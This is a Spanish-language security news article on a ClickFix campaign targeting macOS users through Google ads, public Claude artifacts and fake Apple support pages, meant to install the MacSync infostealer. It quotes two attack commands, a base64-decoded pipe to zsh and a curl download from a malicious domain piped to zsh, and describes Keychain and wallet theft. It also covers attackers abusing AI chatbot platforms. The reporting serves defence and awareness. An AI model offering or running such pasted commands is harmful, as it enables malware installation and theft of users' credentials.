Ataques ClickFix en macOS: campaña con anuncios de Google y artefactos de Claude distribuye el infostealer MacSync

CyberSecureFox 🦊

Investigadores de seguridad han identificado una nueva ola de ataques ClickFix dirigidos a macOS, en la que los atacantes combinan anuncios de pago en Google con el uso malicioso de artefactos públicos del chatbot Claude (Anthropic). El objetivo es convencer al usuario de que ejecute manualmente una orden en la terminal de macOS que descarga e instala el infostealer MacSync. Según Moonlock Lab, uno de estos artefactos maliciosos alojados en Claude acumula ya más de 15 600 visitas, lo que evidencia un alcance significativo de la campaña.

Qué son los ataques ClickFix y por qué son tan efectivos en macOS

El término ClickFix describe una familia de ataques basados en ingeniería social donde el usuario es persuadido para comprometer voluntariamente su propio sistema. En lugar de explotar vulnerabilidades técnicas clásicas, los atacantes presentan una supuesta “solución” a un problema técnico y piden al usuario que copie y pegue un comando “de diagnóstico” o “reparación” en la consola.

En entornos Windows, estos fraudes suelen apoyarse en comandos de PowerShell para “arreglar” errores del navegador, pantallas falsas de bloqueo o problemas de visualización. Con frecuencia se simulan pantallas azules (BSOD), se ralentiza el navegador de forma artificial o se muestra una CAPTCHA falsa que supuestamente se resuelve ejecutando un comando. Aunque históricamente el foco principal han sido los usuarios de Windows, ya se han documentado campañas análogas contra macOS y Linux, reflejando que el ecosistema Apple se percibe cada vez más como una superficie de ataque rentable.

Aprovechamiento de artefactos de Claude, Medium y anuncios de Google

Los llamados artefactos de Claude son recursos públicos (tutoriales, fragmentos de código, notas técnicas, etc.) generados por usuarios mediante el LLM Claude y publicados en el dominio claude.ai. Aunque la propia plataforma indica que el contenido no está moderado, muchos internautas lo perciben como una fuente más fiable que un blog anónimo, factor que los atacantes explotan activamente.

De acuerdo con Moonlock Lab y AdGuard, los actores de amenaza compran anuncios en Google Search asociados a términos técnicos como “online DNS resolver”, “macOS CLI disk space analyzer”, “Homebrew” y búsquedas similares orientadas a usuarios con cierto perfil técnico. Al hacer clic en el resultado patrocinado, la víctima es redirigida bien a un artefacto público de Claude con una guía paso a paso, bien a una página de “soporte de Apple” falsa alojada en Medium. En ambos escenarios, todo el contenido se orienta a que el usuario copie una orden concreta y la ejecute en la terminal.

De la terminal al infostealer: cadena de infección con MacSync

El análisis técnico identifica dos variantes principales de los comandos utilizados en esta campaña. En la primera se emplea una estructura del tipo:

echo «…» | base64 -D | zsh

En la guía se presenta como una instrucción “de servicio” o “de revisión”, pero en realidad la parte codificada en base64 contiene un script de descarga que se decodifica y se ejecuta mediante la shell zsh.

La segunda variante se apoya en una orden similar a:

true && cur»»l -SsLfk –compressed «https://raxelpak[.]com/curl/[hash]» | zsh

Aquí se abusa de la herramienta curl presente por defecto en macOS para descargar código desde el dominio malicioso raxelpak[.]com y pasarlo inmediatamente a zsh para su ejecución. En ambos casos, el resultado final es la descarga en el equipo de la víctima de un loader de la familia MacSync, especializado en el robo silencioso de información sensible. El hecho de que sea el propio usuario quien pega el comando en la terminal permite evadir muchos controles habituales del navegador y de los filtros de descarga.

Capacidades de MacSync: robo de llavero, navegadores y criptoactivos

Una vez ejecutado, MacSync establece comunicación con su servidor de mando y control utilizando un token y un API key incrustados en el código. Para dificultar la detección basada en tráfico, la amenaza falsifica el user-agent, imitando el de un navegador estándar de macOS y mezclando así sus conexiones con el tráfico legítimo.

Las respuestas del servidor C2 se canalizan directamente a osascript, el componente del sistema que ejecuta scripts de AppleScript. Esta capa es la que implementa la lógica de exfiltración de datos: acceso al llavero (Keychain), contraseñas almacenadas, cookies de navegadores, información de carteras de criptomonedas y otros artefactos de alto valor.

La información recopilada se agrupa en el archivo /tmp/osalogging.zip, que luego se envía mediante peticiones HTTP POST al endpoint a2abotnet[.]com/gate. Si la transmisión falla, MacSync divide el archivo en fragmentos y realiza hasta ocho intentos adicionales. Tras una exfiltración exitosa, el malware se encarga de eliminar rastros locales, reduciendo las posibilidades de un análisis forense posterior.

Continuidad con campañas de AMOS y abuso sistemático de la IA generativa

La infraestructura y las técnicas observadas guardan similitudes con campañas anteriores asociadas al infostealer AMOS, también orientado a macOS. En diciembre de 2025, investigadores documentaron campañas ClickFix en las que los anuncios de Google dirigían a los usuarios hacia supuestas sesiones “útiles” con ChatGPT y Grok, utilizadas como gancho para la ejecución de comandos maliciosos. El uso actual de artefactos de Claude refuerza un patrón claro: los atacantes están explotando de forma sistemática las plataformas de IA generativa y los servicios con contenido generado por usuarios, apoyándose en la confianza que inspiran marcas como Apple, Google y los principales LLM.

Medidas de mitigación y buenas prácticas para usuarios y organizaciones

Para los usuarios de macOS, la principal defensa frente a estos ataques ClickFix pasa por mantener una actitud crítica ante cualquier instrucción que implique ejecutar comandos en la terminal, especialmente si procede de anuncios, blogs desconocidos, artefactos de LLM o guías no oficiales. Es recomendable ceñirse a fuentes verificadas (documentación oficial de Apple o del desarrollador, repositorios reconocidos, portales de soporte consolidados) y desconfiar de soluciones “mágicas” que prometen arreglar problemas vagos con un único comando.

Desde el punto de vista técnico, resulta esencial mantener Gatekeeper activado, aplicar puntualmente las actualizaciones de macOS, utilizar soluciones antimalware especializadas para el ecosistema Apple y monitorizar intentos inusuales de acceso al llavero, navegadores y directorios temporales como /tmp. En entornos corporativos, conviene complementar estas medidas con formación específica en ingeniería social e IA generativa, políticas claras sobre el uso de la terminal y revisión de accesos a herramientas como Claude, ChatGPT o plataformas similares.

En un contexto donde el malware para macOS crece en volumen y sofisticación, y donde los atacantes combinan anuncios legítimos, contenido de IA y comandos de consola aparentemente inofensivos, la alfabetización digital y la vigilancia del usuario se convierten en la primera línea de defensa. Verificar siempre el origen de las instrucciones, cuestionar cualquier comando que no se comprenda plenamente y mantenerse al día sobre nuevas tácticas como estos ataques ClickFix son pasos clave para reducir drásticamente el riesgo de infección con infostealers como MacSync.

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.